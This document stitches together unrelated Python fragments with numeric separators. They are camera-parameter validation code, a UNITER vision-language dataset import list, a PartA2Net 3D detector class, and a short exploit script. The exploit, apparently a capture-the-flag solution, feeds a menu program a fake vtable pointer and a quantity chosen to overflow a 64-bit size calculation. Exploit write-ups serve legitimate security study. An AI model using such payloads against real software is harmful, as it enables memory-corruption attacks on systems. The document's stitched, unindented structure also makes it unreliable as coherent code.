formatted_val = self.__validate_value_type__(key, val)
return key, formatted_val
def __check_key__(self, key: Any) -> None:
"""Check whether the key matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
"""
if key not in self.__class__.SUPPORTED_KEYS:
err_msg = 'Key check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
raise KeyError(err_msg)
def __validate_value_type__(self, key: Any, val: Any) -> Any:
"""Check whether the type of value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
TypeError:
Value is supported but doesn't match definition.
Returns:
val (Any): The value casted into correct format.
"""
np_type_mapping = {int: np.integer, float: np.floating}
supported_keys = self.__class__.SUPPORTED_KEYS
validation_result = _TypeValidation.FAIL
ret_val = None
if supported_keys[key]['type'] == int or\
supported_keys[key]['type'] == float:
type_str = str(type(val))
class_name = type_str.split('\'')[1]
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
elif class_name.startswith('numpy'):
# a value is required, not array
if np.issubdtype(
type(val),
np_type_mapping[supported_keys[key]['type']]):
validation_result = _TypeValidation.MATCH
ret_val = val.astype(supported_keys[key]['type'])
elif np.issubdtype(type(val), np.ndarray):
validation_result = _TypeValidation.ARRAY
elif class_name.startswith('torch'):
# only one element tensors
# can be converted to Python scalars
if len(val.size()) == 0:
val_item = val.item()
if type(val_item) == supported_keys[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val_item
else:
validation_result = _TypeValidation.ARRAY
else:
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
if validation_result != _TypeValidation.MATCH:
err_msg = 'Type check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
err_msg += f'type(val)={type(val)}\n'
if validation_result == _TypeValidation.ARRAY:
err_msg += 'A single value is expected, ' +\
'neither an array nor a slice.\n'
raise TypeError(err_msg)
return ret_val
def __parse_chessboard_param__(chessboard_camera_param, name, inverse=True):
"""Parse a dict loaded from chessboard file into another dict needed by
CameraParameter.
Args:
chessboard_camera_param (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to True.
Returns:
dict:
A dict of parameters in CameraParameter.to_dict() format.
"""
camera_param_dict = {}
camera_param_dict['H'] = chessboard_camera_param['imgSize'][1]
camera_param_dict['W'] = chessboard_camera_param['imgSize'][0]
camera_param_dict['in_mat'] = chessboard_camera_param['K']
camera_param_dict['k1'] = 0
camera_param_dict['k2'] = 0
camera_param_dict['k3'] = 0
camera_param_dict['k4'] = 0
camera_param_dict['k5'] = 0
camera_param_dict['p1'] = 0
camera_param_dict['p2'] = 0
camera_param_dict['name'] = name
camera_param_dict['rotation'] = chessboard_camera_param['R']
camera_param_dict['translation'] = chessboard_camera_param['T']
if inverse:
rmatrix = np.linalg.inv(
np.array(camera_param_dict['rotation']).reshape(3, 3))
camera_param_dict['rotation'] = rmatrix.tolist()
tmatrix = np.array(camera_param_dict['translation']).reshape((3, 1))
tvec = -np.dot(rmatrix, tmatrix)
camera_param_dict['translation'] = tvec.reshape((3)).tolist()
return camera_param_dict
__distort_coefficient_names__ = [
'k1', 'k2', 'k3', 'k4', 'k5', 'k6', 'p1', 'p2'
]
def __zero_mat_list__(n=3):
"""Return a zero mat in list format.
Args:
n (int, optional):
Length of the edge.
Defaults to 3.
Returns:
list:
List[List[int]]
"""
ret_list = [[0] * n for _ in range(n)]
return ret_list
|
67056
|
from .data import (
TxtTokLmdb,
DetectFeatLmdb,
ImageLmdbGroup,
ConcatDatasetWithLens,
)
from .loader import PrefetchLoader, MetaLoader
from .vqa import (
VqaEvalDataset,
vqa_collate,
vqa_eval_collate,
UNITER_VqaDataset,
)
from .ve import (
VeEvalDataset,
ve_collate,
ve_eval_collate,
UNITER_VeDataset,
)
from .nlvr2 import (
Nlvr2PairedDataset,
Nlvr2PairedEvalDataset,
Nlvr2TripletDataset,
Nlvr2TripletEvalDataset,
nlvr2_paired_collate,
nlvr2_paired_eval_collate,
nlvr2_triplet_collate,
nlvr2_triplet_eval_collate,
UNITER_NLVR2Dataset,
)
from .itm import (
TokenBucketSamplerForItm,
ItmDataset,
itm_collate,
itm_ot_collate,
ItmRankDataset,
ItmValDataset,
ItmEvalDataset,
ItmRankDatasetHardNegFromImage,
ItmRankDatasetHardNegFromText,
itm_rank_collate,
itm_val_collate,
itm_eval_collate,
itm_rank_hn_collate,
)
from .mlm import MlmDataset, mlm_collate
from .mrm import MrfrDataset, MrcDataset, mrfr_collate, mrc_collate
from .vcr import (
VcrTxtTokLmdb,
VcrEvalDataset,
vcr_collate,
vcr_eval_collate,
UNITER_VcrDataset,
)
from .re import (
ReTxtTokLmdb,
ReDataset,
ReEvalDataset,
re_collate,
re_eval_collate,
)
__all__ = [
'UNITER_VqaDataset',
'UNITER_VcrDataset',
'UNITER_NLVR2Dataset',
'UNITER_VeDataset',
]
|
67067
|
from pwn import *
# Create item
print('1')
FUNC = 0x701e40
#FUNC = 0x41414141 + 0x18
vtable_ptr = FUNC-0x18
print(p64(vtable_ptr) * 8) # name - pointer to fake vtable
print('bob') # description
print('1.23') # price
# Add item to basket
print('4')
print('1') # second item, added above
print('288230376151711745') # quantity - (2**64 / 64) + 1
# Check out
print('6')
|
67086
|
from .detector3d_template import Detector3DTemplate
class PartA2Net(Detector3DTemplate):
def __init__(self, model_cfg, num_class, dataset):
super().__init__(model_cfg=model_cfg, num_class=num_class, dataset=dataset)
self.module_list = self.build_networks()
def forward(self, batch_dict):
for cur_module in self.module_list:
batch_dict = cur_module(batch_dict)
if self.training:
loss, tb_dict, disp_dict = self.get_training_loss()
ret_dict = {
'loss': loss
}
return ret_dict, tb_dict, disp_dict
else:
pred_dicts, recall_dicts = self.post_processing(batch_dict)
return pred_dicts, recall_dicts
def get_training_loss(self):
disp_dict = {}
loss_rpn, tb_dict = self.dense_head.get_loss()
loss_point, tb_dict = self.point_head.get_loss(tb_dict)
loss_rcnn, tb_dict = self.roi_head.get_loss(tb_dict)
if hasattr(self, 'history_query') and self.history_query is not None \
and self.history_query.model_cfg.get("LOSS_CONFIG", None) is not None:
loss_hist_query, tb_dict = self.history_query.get_loss(tb_dict)
loss = loss_rpn + loss_point + loss_rcnn + loss_hist_query
else:
loss = loss_rpn + loss_point + loss_rcnn
return loss, tb_dict, disp_dict
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.